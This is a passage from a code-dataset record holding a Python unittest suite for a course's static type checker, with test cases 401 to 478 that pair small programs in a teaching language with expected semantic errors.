For (x = 1, x < 10, 1) Do\n # Var: z = 1;\n # printStrLn(string_of_int(k));\n # EndFor.\n # Return;\n # EndBody.\n # \"\"\"\n # expect = \"2\"\n # self.assertTrue(TestCodeGen.test(input, expect, 538))\n" }, { "alpha_fraction": 0.3934398889541626, "alphanum_fraction": 0.4166995882987976, "avg_line_length": 30.26055908203125, "blob_id": "2584d204afe35794150f0eaeb289ad82384e5356", "content_id": "adf1bcc6f040bf988a3d12c7b8de2744234130f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 48109, "license_type": "no_license", "max_line_length": 195, "num_lines": 1539, "path": "/Assignments/assignment3/src/test/CheckSuiteAnU.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestChecker\nfrom StaticError import *\nfrom AST import *\n\nclass CheckSuite(unittest.TestCase):\n\n def test_401(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n \"\"\"\n expect = str(NoEntryPoint())\n self.assertTrue(TestChecker.test(input,expect,401))\n \n def test_402(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n\n Function: main\n Body:\n x=1;\n EndBody. \n \"\"\"\n expect = str(Undeclared(Identifier(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,402))\n \n def test_403(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n\n Function: main\n Parameter:x\n Body:\n x=1;\n x=1.6;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),FloatLiteral(1.6))))\n self.assertTrue(TestChecker.test(input,expect,403))\n \n def test_404(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x\n Body:\n EndBody.\n Function: main\n Body:\n Var: x, y = 0.5;\n x = 1. +. foo(1);\n y = foo(2.5) -. 
1.;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[FloatLiteral(2.5)])))\n self.assertTrue(TestChecker.test(input,expect,404))\n \n def test_405(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x\n Body:\n Return;\n EndBody.\n Function: main\n Body:\n Var: x, y = 0.5;\n foo(x);\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(CallStmt(Id(\"foo\"),[Id(\"x\")])))\n self.assertTrue(TestChecker.test(input,expect,405))\n \n def test_406(self):\n \"\"\"Created automatically\"\"\"\n input = \"\"\"\n Function: main\n Parameter: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Body:\n EndBody.\n \"\"\"\n expect = str(Undeclared(Function(),\"main\"))\n self.assertTrue(TestChecker.test(input,expect,406))\n \n def test_407(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x,y\n Body:\n x = 1; \n main( 1.1, 0); \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[FloatLiteral(1.1),IntLiteral(0)])))\n self.assertTrue(TestChecker.test(input,expect,407))\n \n def test_408(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo \n Parameter: x,y\n Body:\n EndBody.\n Function: main\n Parameter: x,y\n Body:\n foo(1,2); \n foo(1. , 2.); \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[FloatLiteral(1.0),FloatLiteral(2.0)])))\n self.assertTrue(TestChecker.test(input,expect,408))\n \n def test_409(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x,y\n Body:\n y=0.5;\n For(x=1,x==1,x+1) Do\n EndFor.\n For(y=1,1==1,y +. 1.2) Do\n EndFor.\n EndBody. 
\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"y\"),IntLiteral(1),BinaryOp(\"==\",IntLiteral(1),IntLiteral(1)),BinaryOp(\"+.\",Id(\"y\"),FloatLiteral(1.2)),([],[]))))\n self.assertTrue(TestChecker.test(input,expect,409))\n \n def test_410(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x\n Body:\n Var: y = 1; \n x = 1.0; \n main(y); \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[Id(\"y\")])))\n self.assertTrue(TestChecker.test(input,expect,410))\n \n def test_411(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Parameter: x\n Body:\n Var: y = 1; \n main(y); \n x = 1.0; \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),FloatLiteral(1.0))))\n self.assertTrue(TestChecker.test(input,expect,411))\n \n def test_412(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"Function: main \n Body:\n printStrLn(read(4));\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"read\"),[IntLiteral(4)])))\n self.assertTrue(TestChecker.test(input,expect,412))\n \n def test_413(self):\n \"\"\"Created automatically\"\"\"\n input = Program([FuncDecl(Id(\"main\"),[],([],[CallStmt(Id(\"printStrLn\"),[CallExpr(Id(\"read\"),[IntLiteral(4)])])]))])\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"read\"),[IntLiteral(4)])))\n self.assertTrue(TestChecker.test(input,expect,413))\n \n def test_414(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"Function: main \n Body:\n printStrLn();\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"printStrLn\"),[])))\n self.assertTrue(TestChecker.test(input,expect,414))\n \n def test_415(self):\n \"\"\"Created automatically\"\"\"\n input = Program([FuncDecl(Id(\"main\"),[],([],[CallStmt(Id(\"printStrLn\"),[])]))])\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"printStrLn\"),[])))\n self.assertTrue(TestChecker.test(input,expect,415))\n \n def 
test_416(self):\n \"\"\"Created automatically\"\"\"\n input = Program([FuncDecl(Id(\"main\"),[],([],[CallExpr(Id(\"foo\"),[])]))])\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,416))\n \n def test_417(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Parameter: x,y,z,t,k\n Body:\n y= x + y \\ z * t;\n x= k % t;\n y= x == z;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"y\"),BinaryOp(\"==\",Id(\"x\"),Id(\"z\")))))\n self.assertTrue(TestChecker.test(input,expect,417))\n \n def test_418(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main \n Parameter: global_var\n Body:\n global_var = 25+6-.2.5%3\\100 ; \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"%\",FloatLiteral(2.5),IntLiteral(3))))\n self.assertTrue(TestChecker.test(input,expect,418))\n \n def test_419(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: a[1][2]= {{1,2}};\n Function: main\n Parameter: x\n Body:\n a[1][2] = x;\n x[1] = 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"x\"),[IntLiteral(1)])))\n self.assertTrue(TestChecker.test(input,expect,419))\n \n def test_420(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var:a[5]= {1,2,3,4,5};\n Var:b[5];\n a=b;\n a[5]=b;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(ArrayCell(Id(\"a\"),[IntLiteral(5)]),Id(\"b\"))))\n self.assertTrue(TestChecker.test(input,expect,420))\n \n def test_421(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:a[5]= {1,2,3,4,5};\n Var:b[5];\n b={1.,2.,3.,4.,5.};\n a=b;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),Id(\"b\"))))\n self.assertTrue(TestChecker.test(input,expect,421))\n \n def test_422(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var:a[5]= 
{1,2,3,4,5};\n Var:b[4]= {1,2,3,4};\n a=b;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"a\"),Id(\"b\"))))\n self.assertTrue(TestChecker.test(input,expect,422))\n \n def test_423(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var:a[5]= {1,2,3,4,5};\n Var:b[5];\n Var:c;\n c = b[5] +. 1;\n a=b; \n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+.\",ArrayCell(Id(\"b\"),[IntLiteral(5)]),IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,423))\n \n def test_424(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var:a[5],b[5];\n a=b;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"a\"),Id(\"b\"))))\n self.assertTrue(TestChecker.test(input,expect,424))\n \n def test_425(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Var: x[5]={1,2};\n Var: x=1;\n Function: main\n Body:\n EndBody. \n \"\"\"\n expect = str(Redeclared(Variable(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,425))\n \n def test_426(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:x;\n Function: main\n Body:\n Var:x;\n Var:main;\n Var:x[5]={1,2,3,4,5};\n EndBody.\n \"\"\"\n expect = str(Redeclared(Variable(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,426))\n \n def test_427(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n EndBody.\n Function: main\n Parameter: x\n Body:\n\n EndBody.\n \"\"\"\n expect = str(Redeclared(Function(),\"main\"))\n self.assertTrue(TestChecker.test(input,expect,427))\n \n def test_428(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Parameter: x\n Body:\n Var:x;\n EndBody.\n \"\"\"\n expect = str(Redeclared(Variable(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,428))\n \n def test_429(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Parameter: x,x\n 
Body:\n\n EndBody.\n \"\"\"\n expect = str(Redeclared(Parameter(),\"x\"))\n self.assertTrue(TestChecker.test(input,expect,429))\n \n def test_430(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:x;\n Function: main\n Parameter: x\n Body:\n x=foo;\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,430))\n \n def test_431(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n foo();\n EndBody.\n \"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,431))\n \n def test_432(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x,y,a\n Body:\n y = a +foo(x);\n EndBody.\n\n Function: foo\n Parameter: x\n Body:\n\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"y\"),BinaryOp(\"+\",Id(\"a\"),CallExpr(Id(\"foo\"),[Id(\"x\")])))))\n self.assertTrue(TestChecker.test(input,expect,432))\n \n def test_433(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var: x,y;\n x=y;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"x\"),Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,433))\n \n def test_434(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x;\n If (foo(x)) Then\n x=1;\n EndIf.\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n\n \"\"\"\n expect = str(TypeCannotBeInferred(If([(CallExpr(Id(\"foo\"),[Id(\"x\")]),[],[Assign(Id(\"x\"),IntLiteral(1))])],([],[]))))\n self.assertTrue(TestChecker.test(input,expect,434))\n \n def test_435(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x,y\n Body:\n EndBody.\n\n Function: main\n Body:\n Var:x=1,y;\n foo(x,y);\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(CallStmt(Id(\"foo\"),[Id(\"x\"),Id(\"y\")])))\n 
self.assertTrue(TestChecker.test(input,expect,435))\n \n def test_436(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x;\n x = 1 + foo(x);\n EndBody. \n Function: foo\n Parameter: x\n Body:\n\n EndBody.\n\n \"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"x\"),BinaryOp(\"+\",IntLiteral(1),CallExpr(Id(\"foo\"),[Id(\"x\")])))))\n self.assertTrue(TestChecker.test(input,expect,436))\n \n def test_437(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \nFunction: main\nBody:\n Var:x;\n If x Then\n Var:y;\n EndIf.\nEndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(If([(Id(\"x\"),[VarDecl(Id(\"y\"),[],None)],[])],([],[]))))\n self.assertTrue(TestChecker.test(input,expect,437))\n \n def test_438(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x;\n If x Then\n x=1;\n Else\n Var:y,z;\n y=x;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,438))\n \n def test_439(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: i , x;\n For (i = 1, i <= x*x,i*i+.1.5)\n Do x=x+1;\n EndFor.\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+.\",BinaryOp(\"*\",Id(\"i\"),Id(\"i\")),FloatLiteral(1.5))))\n self.assertTrue(TestChecker.test(input,expect,439))\n \n def test_440(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var: x;\n For (x=1, x>1 , x+1) Do\n Var:y;\n EndFor.\n EndBody.\n\n \"\"\"\n expect = str(TypeCannotBeInferred(For(Id(\"x\"),IntLiteral(1),BinaryOp(\">\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"+\",Id(\"x\"),IntLiteral(1)),([VarDecl(Id(\"y\"),[],None)],[]))))\n self.assertTrue(TestChecker.test(input,expect,440))\n \n def test_441(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x;\n While (foo(x))\n Do\n x=1;\n EndWhile.\n 
EndBody.\n \n Function: foo\n Parameter: x\n Body:\n\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(While(CallExpr(Id(\"foo\"),[Id(\"x\")]),([],[Assign(Id(\"x\"),IntLiteral(1))]))))\n self.assertTrue(TestChecker.test(input,expect,441))\n \n def test_442(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x,y;\n While (x)\n Do\n Var:z;\n y=1;\n EndWhile.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(While(Id(\"x\"),([VarDecl(Id(\"z\"),[],None)],[Assign(Id(\"y\"),IntLiteral(1))]))))\n self.assertTrue(TestChecker.test(input,expect,442))\n \n def test_443(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Parameter: x\n Body:\n x= 1+foo(1);\n foo(1);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[IntLiteral(1)])))\n self.assertTrue(TestChecker.test(input,expect,443))\n \n def test_444(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x\n Body:\n foo(1);\n x= 1+foo(1);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+\",IntLiteral(1),CallExpr(Id(\"foo\"),[IntLiteral(1)]))))\n self.assertTrue(TestChecker.test(input,expect,444))\n \n def test_445(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x\n Body:\n EndBody.\n Function: main\n Body:\n Var:x,y;\n x= y + foo(1,2);\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[IntLiteral(1),IntLiteral(2)])))\n self.assertTrue(TestChecker.test(input,expect,445))\n \n def test_446(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x;\n Do\n Var:y;\n While x\n EndDo.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Dowhile(([VarDecl(Id(\"y\"),[],None)],[]),Id(\"x\"))))\n self.assertTrue(TestChecker.test(input,expect,446))\n \n 
def test_447(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var:x=1;\n If x Then\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(If([(Id(\"x\"),[],[])],([],[]))))\n self.assertTrue(TestChecker.test(input,expect,447))\n \n def test_448(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x=1;\n For (x = !True, x>1 , 0+1) Do\n EndFor.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),UnaryOp(\"!\",BooleanLiteral(True)),BinaryOp(\">\",Id(\"x\"),IntLiteral(1)),BinaryOp(\"+\",IntLiteral(0),IntLiteral(1)),([],[]))))\n self.assertTrue(TestChecker.test(input,expect,448))\n \n def test_449(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x,y=0.5;\n For (x=1, x>1 , y +. 1) Do\n EndFor.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+.\",Id(\"y\"),IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,449))\n \n def test_450(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x;\n For (x=1, 1+1 , x+1) Do\n EndFor.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(For(Id(\"x\"),IntLiteral(1),BinaryOp(\"+\",IntLiteral(1),IntLiteral(1)),BinaryOp(\"+\",Id(\"x\"),IntLiteral(1)),([],[]))))\n self.assertTrue(TestChecker.test(input,expect,450))\n \n def test_451(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x=1,y;\n While (x)\n Do\n EndWhile.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(While(Id(\"x\"),([],[]))))\n self.assertTrue(TestChecker.test(input,expect,451))\n \n def test_452(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x=1,y;\n Do\n While (x)\n EndDo.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Dowhile(([],[]),Id(\"x\"))))\n self.assertTrue(TestChecker.test(input,expect,452))\n \n def test_453(self):\n 
\"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Body:\n EndBody.\n Function: main\n Body:\n Var:x;\n foo();\n foo()[1] = x+1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(CallExpr(Id(\"foo\"),[]),BinaryOp(\"+\",Id(\"x\"),IntLiteral(1)))))\n self.assertTrue(TestChecker.test(input,expect,453))\n \n def test_454(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Body:\n EndBody.\n Function: main\n Body:\n Var:x;\n foo();\n x = foo();\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),CallExpr(Id(\"foo\"),[]))))\n self.assertTrue(TestChecker.test(input,expect,454))\n \n def test_455(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n foo();\n EndBody.\n Function: foo\n Body:\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,455))\n \n def test_456(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var:x;\n x = 1+foo();\n EndBody.\n Function: foo\n Body:\n Return 1.5;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.5))))\n self.assertTrue(TestChecker.test(input,expect,456))\n \n def test_457(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\" \n Function: main\n Body:\n Var: x;\n If x Then\n Return 1;\n Else\n Return 1.5;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.5))))\n self.assertTrue(TestChecker.test(input,expect,457))\n \n def test_458(self):\n \"\"\"Created automatically\"\"\"\n input = \"\"\"\n Function: main\n Body:\n Var: x;\n foo(1,2);\n x = foo(5,99);\n Return 0;\n EndBody.\n Function: foo\n Parameter: x1, x2\n Body:\n Return;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),CallExpr(Id(\"foo\"),[IntLiteral(5),IntLiteral(99)]))))\n self.assertTrue(TestChecker.test(input,expect,458))\n \n 
def test_459(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: x;\n Return x;\n EndBody.\n\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"x\"))))\n self.assertTrue(TestChecker.test(input,expect,459))\n \n def test_460(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var: a[1][2];\n a[1+1][0.5+.1.5] = 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"a\"),[BinaryOp(\"+\",IntLiteral(1),IntLiteral(1)),BinaryOp(\"+.\",FloatLiteral(0.5),FloatLiteral(1.5))])))\n self.assertTrue(TestChecker.test(input,expect,460))\n \n def test_461(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Function: main\n Body:\n Var: a[1][2];\n a[1][2][3] = 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(Id(\"a\"),[IntLiteral(1),IntLiteral(2),IntLiteral(3)])))\n self.assertTrue(TestChecker.test(input,expect,461))\n \n def test_462(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: n\n Body:\n Var : x[1][2]={{1,2}} ;\n Return x;\n EndBody.\n \n\n Function: main\n Body:\n Var:x;\n foo(x)[x+3][0.5]=1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(ArrayCell(CallExpr(Id(\"foo\"),[Id(\"x\")]),[BinaryOp(\"+\",Id(\"x\"),IntLiteral(3)),FloatLiteral(0.5)])))\n self.assertTrue(TestChecker.test(input,expect,462))\n \n def test_463(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n \n Var: x;\n Function: fact\n Parameter: n\n Body:\n If n == 0 Then\n Return 1;\n Else\n Return n * fact (n - 1);\n EndIf.\n EndBody.\n Function: main\n Body:\n x = 10;\n fact(x);\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"fact\"),[Id(\"x\")])))\n self.assertTrue(TestChecker.test(input,expect,463))\n \n def test_464(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: a[5], b\n Body:\n Var: i;\n While (i < 5) Do\n a[i] = b +. 
1.0;\n i = i + 1;\n EndWhile.\n i= 0.5;\n EndBody.\n Function: main\n Body:\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"i\"),FloatLiteral(0.5))))\n self.assertTrue(TestChecker.test(input,expect,464))\n \n def test_465(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var:a[5]={1,2,3,4,5};\n Var: b[2][3]={{1,2,3},{4,5,6}};\n a[3 + foo(2)] = a[b[2][3]] +. 4.0;\n EndBody.\n \"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,465))\n \n def test_466(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: foo\n Parameter: x,y\n Body:\n foo (2 + x, 4. \\. y);\n foo(x,y);\n EndBody. \n Function: main\n Body:\n foo(3,6);\n EndBody. \n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[IntLiteral(3),IntLiteral(6)])))\n self.assertTrue(TestChecker.test(input,expect,466))\n \n def test_467(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n If True Then\n ElseIf True Then\n Var: a;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(If([(BooleanLiteral(True),[],[]),(BooleanLiteral(True),[VarDecl(Id(\"a\"),[],None)],[])],([],[]))))\n self.assertTrue(TestChecker.test(input,expect,467))\n \n def test_468(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n For (a = 1, a < 10, 1) Do\n Var:a=1;\n EndFor.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"a\"))\n self.assertTrue(TestChecker.test(input,expect,468))\n \n def test_469(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: a[3]={\"Mot\",\"2\",\"Three\"};\n Function: main\n Body:\n a[1] = a[1] + a[2];\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+\",ArrayCell(Id(\"a\"),[IntLiteral(1)]),ArrayCell(Id(\"a\"),[IntLiteral(2)]))))\n self.assertTrue(TestChecker.test(input,expect,469))\n \n def test_470(self):\n \"\"\"Created automatically\"\"\"\n 
input = r\"\"\"\n \n Function: main\n Body:\n Var:a,b,c,d;\n a = a + b || c - d;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"||\",BinaryOp(\"+\",Id(\"a\"),Id(\"b\")),BinaryOp(\"-\",Id(\"c\"),Id(\"d\")))))\n self.assertTrue(TestChecker.test(input,expect,470))\n \n def test_471(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var: sum = 0, a = 1;\n While a < 10 Do\n Var: b, cal = 1;\n While b < 10 Do\n cal = cal * b;\n b = b + 1;\n EndWhile.\n sum = sum + prod;\n a = a + 1;\n EndWhile.\n EndBody.\n \"\"\"\n expect = str(Undeclared(Identifier(),\"prod\"))\n self.assertTrue(TestChecker.test(input,expect,471))\n \n def test_472(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main \n Body: \n Var: a=1,x; \n a=foo(x); \n EndBody. \n\"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,472))\n \n def test_473(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Body:\n Var:x;\n If True Then\n x = 3;\n Else \n x = 2.0;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),FloatLiteral(2.0))))\n self.assertTrue(TestChecker.test(input,expect,473))\n \n def test_474(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:x =1;\n Function: main\n Parameter: y\n Body:\n x = y + main(0.5) ;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"main\"),[FloatLiteral(0.5)])))\n self.assertTrue(TestChecker.test(input,expect,474))\n \n def test_475(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var:x =1;\n Function: main\n Parameter: y\n Body:\n x = main(0.5) + y;\n EndBody. 
\"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"+\",CallExpr(Id(\"main\"),[FloatLiteral(0.5)]),Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,475))\n \n def test_476(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x\n Body:\n Var:y;\n Do\n x=1;\n main(0.5);\n While y \n EndDo.\n EndBody. \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"main\"),[FloatLiteral(0.5)])))\n self.assertTrue(TestChecker.test(input,expect,476))\n \n def test_477(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Function: main\n Parameter: x, a, b, c\n Body:\n If(x == ((False||True) && (a > b + c))) Then\n a = b - c;\n Else\n a = b + c;\n x = True;\n EndIf.\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"==\",Id(\"x\"),BinaryOp(\"&&\",BinaryOp(\"||\",BooleanLiteral(False),BooleanLiteral(True)),BinaryOp(\">\",Id(\"a\"),BinaryOp(\"+\",Id(\"b\"),Id(\"c\")))))))\n self.assertTrue(TestChecker.test(input,expect,477))\n \n def test_478(self):\n \"\"\"Created automatically\"\"\"\n input = r\"\"\"\n Var: abc[2][3][4];\n Function: foo\n Parameter: x[2]\n Body:\n x[1] = 1;\n abc[1] = 2.;\n EndBody.\n Function: main\n Body:\n Var: 